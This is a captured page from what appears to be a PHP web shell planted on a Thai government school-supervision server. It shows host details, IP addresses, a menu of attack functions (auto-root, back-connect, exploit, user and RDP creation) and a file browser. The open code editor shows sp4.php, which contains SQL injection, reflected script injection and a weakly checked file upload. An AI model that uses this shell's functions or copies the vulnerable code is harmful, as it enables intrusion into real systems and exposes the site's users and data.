Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
supervision /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
detail.php
3.16
KB
-rw-r--r--
indicator.php
30.6
KB
-rw-r--r--
livesearch1.php
795
B
-rw-r--r--
livesearch2.php
1.03
KB
-rw-r--r--
livesearch3.php
787
B
-rw-r--r--
livesearch4.php
1.02
KB
-rw-r--r--
livesearch_101.php
17.73
KB
-rw-r--r--
permission.php
11.16
KB
-rw-r--r--
report_1.php
31.11
KB
-rw-r--r--
report_2.php
29.43
KB
-rw-r--r--
report_3.php
21.18
KB
-rw-r--r--
report_4.php
5.9
KB
-rw-r--r--
report_5.php
4.04
KB
-rw-r--r--
sp1.php
62.26
KB
-rw-r--r--
sp1_mobile.php
50.04
KB
-rw-r--r--
sp2.php
6.59
KB
-rw-r--r--
sp3.php
5.75
KB
-rw-r--r--
sp4.php
5.23
KB
-rw-r--r--
standard.php
7.89
KB
-rw-r--r--
std_detail.php
8.18
KB
-rw-r--r--
std_detail2.php
9.22
KB
-rw-r--r--
supervision_activity.php
11.1
KB
-rw-r--r--
supervision_activity_number.ph...
10.05
KB
-rw-r--r--
supervision_activity_rate.php
5.49
KB
-rw-r--r--
supervision_item.php
11.3
KB
-rw-r--r--
supervision_year.php
11.12
KB
-rw-r--r--
teach_table.php
13.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sp4.php
<?php /** ensure this file is being included by a parent file */ //defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); if(!(isset($_SESSION['login_user_id']))){ session_start(); } if(!($_SESSION['login_user_id']==$_REQUEST['officer'])){ exit(); } if(isset($_POST['ref_id'])){ $rec_date = date("Y-m-d"); $sql_year = "select year from supervision_year where year_active='1' "; $dbquery_year = mysqli_query($connect,$sql_year); $result_year = mysqli_fetch_array($dbquery_year); $year=$result_year['year']; $sql_item = "select id from supervision_item where item_active='1' "; $dbquery_item = mysqli_query($connect,$sql_item); $result_item = mysqli_fetch_array($dbquery_item); $item=$result_item['id']; //person_id $sql_person = "select * from person_sch_main where school_code='$_POST[school_index]' and status='0' order by position_code"; $dbquery_person = mysqli_query($connect,$sql_person ); $result_person = mysqli_fetch_array($dbquery_person); $person_id=$result_person['person_id']; $sql = "insert into supervision_main(level,standard_year,person_id,school_id,ref_id,item,assessor,rec_date,status) values ('3','$year', '$person_id','$_POST[school_index]','$_POST[ref_id]','$item','$_POST[officer]','$rec_date','1')"; $dbquery = mysqli_query($connect,$sql); if($_POST['comment']!=""){ $sql = "insert into supervision_comment(ref_id,person_id,comment,rec_date) values ('$_POST[ref_id]', '$person_id', '$_POST[comment]' ,'$rec_date')"; $dbquery = mysqli_query($connect,$sql); } function file_upload() { $uploaddir = 'modules/supervision/upload_files/'; //ที่เก็บไไฟล์ $uploadfile = $uploaddir.$_FILES['userfile']['name']; $file_name = $_FILES['userfile']['name'] ; $array_last = explode("." ,$file_name) ; $lastname = strtolower ($array_last[1]) ; $lastname_2=".".$lastname; $rand_number=rand(); $file_name=$_POST['ref_id'].$rand_number; if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { $before_name = $uploadfile; $name = $file_name.$lastname_2; $changed_name = $uploaddir.$file_name.$lastname_2; rename("$before_name" , "$changed_name"); //ลดขนาดภาพ if(($lastname =="JPG") or ($lastname=="jpg")){ $ori_file=$changed_name; $ori_size=getimagesize($ori_file); $ori_w=$ori_size[0]; $ori_h=$ori_size[1]; if($ori_w>800){ $new_w=800; $new_h=round(($new_w/$ori_w)*$ori_h); $ori_img=imagecreatefromjpeg($ori_file); $new_img=imagecreatetruecolor($new_w, $new_h); imagecopyresized($new_img, $ori_img,0,0, 0,0, $new_w, $new_h, $ori_w, $ori_h); $new_file=$ori_file; imagejpeg($new_img, $new_file); imagedestroy($ori_img); imagedestroy($new_img); } } return $name; } } if($_FILES['userfile']['name']!=""){ $myfile1_name = $_FILES ['userfile'] ['name'] ; $array_last1 = explode("." ,$myfile1_name) ; $c1 =count ($array_last1) - 1 ; $lastname1 = strtolower ($array_last1 [$c1] ) ; if($lastname1 =="doc" or $lastname1 =="docx" or $lastname1 =="rar" or $lastname1 =="pdf" or $lastname1 =="xls" or $lastname1 =="xlsx" or $lastname1 =="zip" or $lastname1 =="jpg" or $lastname1 =="gif" ) { $file=file_upload(); $sql = "insert into supervision_file(ref_id,file_name) values ('$_POST[ref_id]','$file')"; $dbquery = mysqli_query($connect,$sql); } } echo "<script>document.location.href='?option=supervision&task=main/sp1&school_index=$_POST[school_index]&person_index=$person_id';</script>\n"; } //ref_id $timestamp = mktime(date("H"), date("i"),date("s"), date("m") ,date("d"), date("Y")) ; $rand_number=rand(); $ref_id= $timestamp."x".$rand_number; echo "<form Enctype = 'multipart/form-data' id='frm2' name='frm2' action='?option=supervision&task=main/sp4&index=4' method=post>"; echo "<Br><Br>"; echo "<Table width='300' Border='0' align='center'>"; echo "<Tr align='left'><Td ></Td><Td align='right'>นิเทศ </Td><Td><textarea rows='10' cols='35' name='comment'></textarea></Td></Tr>"; echo "<tr align='left'>"; echo "<Td ></Td><td align='right'>เอกสาร </td>"; echo "<td align='left'><input name = 'userfile' type = 'file'></td>"; echo "</tr>"; echo "<tr align='left' height='70'>"; echo "<Td ></Td><td></td><td align='left'>"; echo "<INPUT TYPE='submit' name='smb' id='submit' value='ตกลง' class='submit'"; echo "</td></tr>"; echo "</Table>"; echo "<INPUT TYPE='Hidden' name='ref_id' value='$ref_id'>"; echo "<INPUT TYPE='Hidden' name='school_index' value='$_GET[school_index]'>"; echo "<INPUT TYPE='Hidden' name='officer' value='$_GET[officer]'>"; echo "</form>"; ?> <script> function goto_upload(val){ if(val==1){ callfrm2(); } } function callfrm2() { frm2.target = "_self"; frm2.method = "POST"; document.getElementById("frm2").submit(); //return false; } </script>
Close
